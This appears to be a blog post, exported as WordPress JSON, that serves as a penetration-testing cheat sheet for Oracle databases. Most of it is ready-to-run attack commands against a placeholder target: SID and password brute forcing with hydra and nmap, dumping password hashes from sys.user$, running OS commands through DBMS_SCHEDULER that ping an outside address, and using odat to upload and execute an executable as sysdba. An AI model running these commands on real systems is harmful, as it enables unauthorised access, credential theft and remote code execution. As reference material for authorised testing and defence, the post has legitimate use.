{"id":1167,"date":"2020-04-06T14:17:47","date_gmt":"2020-04-06T12:17:47","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1167"},"modified":"2026-06-03T21:04:05","modified_gmt":"2026-06-03T19:04:05","slug":"oracle-sql","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1167","title":{"rendered":"Oracle <span class=\"caps\">SQL<\/span>"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">In Ora\u00adcle <span class=\"caps\">SQL<\/span>, a <span class=\"caps\">SID<\/span> (Ser\u00advice Iden\u00adti\u00adfi\u00ader) is basi\u00adcal\u00adly a database.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Enumeration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Get gen\u00ader\u00adal information<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">tnscmd10g -h $target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Try to get a&nbsp;<span class=\"caps\">SID<\/span>:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted reset-3c756112--codeBlock-75b39b81\"><span data-key=\"2ae3e5e8078d42699f98bc8ede57b170\">tnscmd10g status-p 1521 -h <\/span>$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Anoth\u00ader tool: Ora\u00adcle Scanner<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">oscanner -s $target -P 1521<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Metas\u00adploit module<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">scanner\/oracle\/tnslsnr_version<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Brute force&nbsp;<span class=\"caps\">SID<\/span><\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -L \/usr\/share\/metasploit-framework\/data\/wordlists\/sid.txt -s 1521 $target oracle-sid<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap --script oracle-sid-brute -p 1521 $target<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Brute force credentials<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Brute force (only a pass\u00adword is need\u00aded, no user\u00adname) for <em>lis\u00adten\u00ader<\/em><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -P \/usr\/share\/wordlists\/rockyou.txt -t 32 -s 1521 $target oracle-listener<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Or use&nbsp;odat<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">odat all -s $target -p 1521 [-d XE]<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Command line enumeration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">You prob\u00ada\u00adbly want to use <strong><span class=\"caps\">XE<\/span><\/strong> as <code>$dbname<\/code>.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">export LD_LIBRARY_PATH=\/usr\/lib\/oracle\/19.6\/client64\/lib<br>sqlplus $user\/$pass@$target\/$dbname 'as sysdba'<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Enu\u00admer\u00adate version<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">select * from v$version;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Enu\u00admer\u00adate&nbsp;users<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">select * from all_users;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get cur\u00adrent&nbsp;user:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT user from dual;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get all&nbsp;users:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">select table_name from all_tables where owner = 'SYS' order by table_name;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get details about a&nbsp;table:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">select column_name, data_type from all_tab_columns where table_name = 'MENU';<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get all user infor\u00adma\u00adtion (also pass\u00adword hash\u00ades!) (<a href=\"https:\/\/seanstuber.com\/how-oracle-stores-passwords\/\">See this arti\u00adcle for back\u00adground<\/a>: spare4 is now used due to a migra\u00adtion from ver\u00adsion&nbsp;10.)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">select name,password,spare4 from sys.user$;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exe\u00adcute a com\u00admand via the scheduler:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">exec DBMS_SCHEDULER.create_program('RDS2008','EXECUTABLE','ping 10.10.14.12',0,TRUE);<br>exec DBMS_SCHEDULER.create_job(job_name =&gt; 'RDS2008JOB',program_name =&gt; 'RDS2008',start_date =&gt; NULL,repeat_interval =&gt; NULL,end_date =&gt; NULL,enabled =&gt; TRUE,auto_drop =&gt; TRUE)<br>exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME =&gt; 'RDS2008');<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Upload and exe\u00adcute as the <span class=\"caps\">DB<\/span> admin (Sys\u00adtem?!)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">odat utlfile -s $target -p 1521 -U \"scott\" -P \"tiger\" -d XE --putFile \/temp mps64.exe mps64.exe --sysdba\nodat externaltable -s $target -p 1521 -U \"scott\" -P \"tiger\" -d XE --exec C:\\ s64.exe --sysdba<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Links<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/medium.com\/@netscylla\/pentesters-guide-to-oracle-hacking-1dcf7068d573\">Very good workthrough<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/tacticthreat\/Oracle-Pentesting-Reference\">Metas\u00adploit mod\u00adules and fur\u00adther&nbsp;links<\/a><\/li>\n\n\n\n<li><a href=\"http:\/\/www.red-database-security.com\/wp\/oracle_cheat.pdf\">Ora\u00adcle <span class=\"caps\">SQL<\/span> cheat&nbsp;sheet<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/weaknetlabs\/Penetration-Testing-Grimoire\/blob\/master\/Post%20Exploitation\/Databases\/oracle.md\">Anoth\u00ader Ora\u00adcle <span class=\"caps\">SQL<\/span> cheat&nbsp;sheet<\/a><\/li>\n\n\n\n<li><a href=\"http:\/\/pentestmonkey.net\/cheat-sheet\/sql-injection\/oracle-sql-injection-cheat-sheet\">Anoth\u00ader cheat&nbsp;sheet<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/seanstuber.com\/how-oracle-stores-passwords\/\">Ora\u00adcle pass\u00adword stor\u00adage formats<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>In Ora\u00adcle <span class=\"caps\">SQL<\/span>, a <span class=\"caps\">SID<\/span> (Ser\u00advice Iden\u00adti\u00adfi\u00ader) is basi\u00adcal\u00adly a data\u00adbase. Enu\u00admer\u00ada\u00adtion Get gen\u00ader\u00adal infor\u00adma\u00adtion tnscmd10g \u2011h $tar\u00adget Try to get a&nbsp;<span class=\"caps\">SID<\/span>: tnscmd10g status\u2011p 1521 \u2011h $tar\u00adget Anoth\u00ader tool: Ora\u00adcle Scan\u00adner oscan\u00adner \u2011s $tar\u00adget \u2011P 1521 Metas\u00adploit mod\u00adule scanner\/oracle\/tnslsnr_version Brute force&nbsp;<span class=\"caps\">SID<\/span> hydra \u2011L \/usr\/share\/metasploit-framework\/data\/wordlists\/sid.txt \u2011s 1521 $tar\u00adget ora\u00adcle-sid nmap \u2013script ora\u00adcle-sid-brute \u2011p 1521 $tar\u00adget&nbsp;Brute&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[477],"tags":[177,246,247,49],"class_list":["post-1167","post","type-post","status-publish","format-standard","hentry","category-software","tag-database","tag-oracle","tag-oracle-sql","tag-sql"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1167","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1167"}],"version-history":[{"count":22,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1167\/revisions"}],"predecessor-version":[{"id":4968,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1167\/revisions\/4968"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}